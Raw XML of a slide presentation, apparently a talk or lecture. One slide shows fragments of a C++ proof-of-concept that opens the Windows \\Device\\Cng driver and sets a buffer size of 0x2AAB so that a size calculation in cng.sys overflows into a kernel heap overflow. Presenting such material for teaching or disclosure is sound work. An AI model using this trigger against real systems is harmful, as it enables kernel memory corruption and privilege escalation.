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608053059" val="1020" rev64="64" revOS="4"/>
  <pr:smFileRevision xmlns:pr="smNativeData" xmlns="smNativeData" dt="1608053059" val="101"/>
  <p:showPr showNarration="1">
    <p:penClr>
      <a:srgbClr val="0000FF"/>
    </p:penClr>
  </p:showPr>
  <p:extLst>
    <p:ext uri="smNativeData">
      <pr:guideOptions xmlns:pr="smNativeData" xmlns="smNativeData" dt="1608053059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65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="372" y="232"/>
      </p:cViewPr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4" d="100"/>
        <a:sy n="14" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToObjects="1" showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="372" y="232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E1E5-ABD9-5F17-97B2-5D42AFFC610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8617-59D9-5F70-97B2-AF25C8FC61FA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F0AE-E0D9-5F06-97B2-1653BEFC6143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B9C1-8FD9-5F4F-97B2-791AF7FC612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EA73-3DD9-5F1C-97B2-CB49A4FC619E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EEAF-E1D9-5F18-97B2-174DA0FC6142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/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="1600"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="1400"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="1400"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="1400"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="1400"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="1400"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="14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9104-4AD9-5F67-97B2-BC32DFFC61E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F4AD-E3D9-5F02-97B2-1557BAFC6140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F960-2ED9-5F0F-97B2-D85AB7FC618D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801A-54D9-5F76-97B2-A223CEFC61F7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F006-48D9-5F06-97B2-BE53BEFC61EB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C5EF-A1D9-5F33-97B2-57668BFC6102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/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/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8004-4AD9-5F76-97B2-BC23CEFC61E9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A541-0FD9-5F53-97B2-F906EBFC61AC}" type="footer">
              <a:t/>
            </a:fld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FA32-7CD9-5F0C-97B2-8A59B4FC61DF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E557-19D9-5F13-97B2-EF46ABFC61BA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E7F9-B7D9-5F11-97B2-4144A9FC6114}" type="footer">
              <a:t/>
            </a:fld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90C8-86D9-5F66-97B2-7033DEFC6125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BA6D-23D9-5F4C-97B2-D519F4FC6180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F1DC-92D9-5F07-97B2-6452BFFC6131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BACF-81D9-5F4C-97B2-7719F4FC6122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/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FDB6-F8D9-5F0B-97B2-0E5EB3FC615B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8FED-A3D9-5F79-97B2-552CC1FC6100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C7E9-A7D9-5F31-97B2-516489FC6104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/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2400"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="20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/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DB9F-D1D9-5F2D-97B2-277895FC617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FD57-19D9-5F0B-97B2-EF5EB3FC61BA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B51D-53D9-5F43-97B2-A516FBFC61F0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B46F-21D9-5F42-97B2-D717FAFC618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AF31-7FD9-5F59-97B2-890CE1FC61DC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AF87-C9D9-5F59-97B2-3F0CE1FC616A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ABEC0-8ED9-5F48-97B2-781DF0FC612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40AD8F5-BBD9-5F2E-97B2-4D7B96FC6118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0ACF49-07D9-5F39-97B2-F16C81FC61A4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40AFCE3-ADD9-5F0A-97B2-5B5FB2FC610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  <a:fld id="{340AAA59-17D9-5F5C-97B2-E109E4FC61B4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40AF06C-22D9-5F06-97B2-D453BEFC6181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spc="0" prSpc="50" pitch="5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zc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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Ein dummes C++ Beispiel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Q/HY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AAAAAAmAAAACAAAAAG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/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2400"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" indent="0">
              <a:buNone/>
              <p:prBullet>
                <a:buNone/>
              </p:prBullet>
              <a:defRPr sz="2000"/>
            </a:lvl9pPr>
          </a:lstStyle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rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:t>(hCng </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>== </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:t>) {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  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="8D8D8D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"[-] Failed to open \\Device\\Cng: %u\n"</a:t>
            </a:r>
            <a:r>
              <a:t>, GetLastError());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  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:t>;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}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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="8D8D8D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"[+] \\Device\\Cng opened, handle: %p\n"</a:t>
            </a:r>
            <a:r>
              <a:t>, hCng);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00808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rPr>
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:t>//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00808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// DataBufferSize overflows when used for allocating memory in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00808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// cng!CfgAdtpFormatPropertyBlock as (uint16)(DataBufferSize * 6).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00808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//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00808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// In this proof-of-concept, an allocation of (uint16)(0x2AAB * 6) = 2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00808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// bytes is requested while 0x2AAB * 6 = 0x10002 bytes are written to it.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00808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//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rPr>
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  CONST DWORD DataBufferSize </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x2AAB</a:t>
            </a:r>
            <a:r>
              <a:t>;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CONST DWORD IoctlSize </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4096 </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ DataBufferSize</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="9144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1400" b="0" i="0" u="none" strike="noStrike" kern="1" spc="0" prSpc="50" pitch="50" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:txBgFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:txBgFill>
                <a:latin typeface="Consolas" pitchFamily="3" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="3" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="3" charset="0"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  BYTE </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*IoctlData = </a:t>
            </a:r>
            <a:r>
              <a:t>(BYTE </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:t>)HeapAlloc(GetProcessHeap(), </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:t>, IoctlSize);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msteinbo</cp:lastModifiedBy>
  <cp:revision>0</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-15T17:22:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-15T17:24:19Z</dcterms:modified>
</cp:coreProperties>
</file>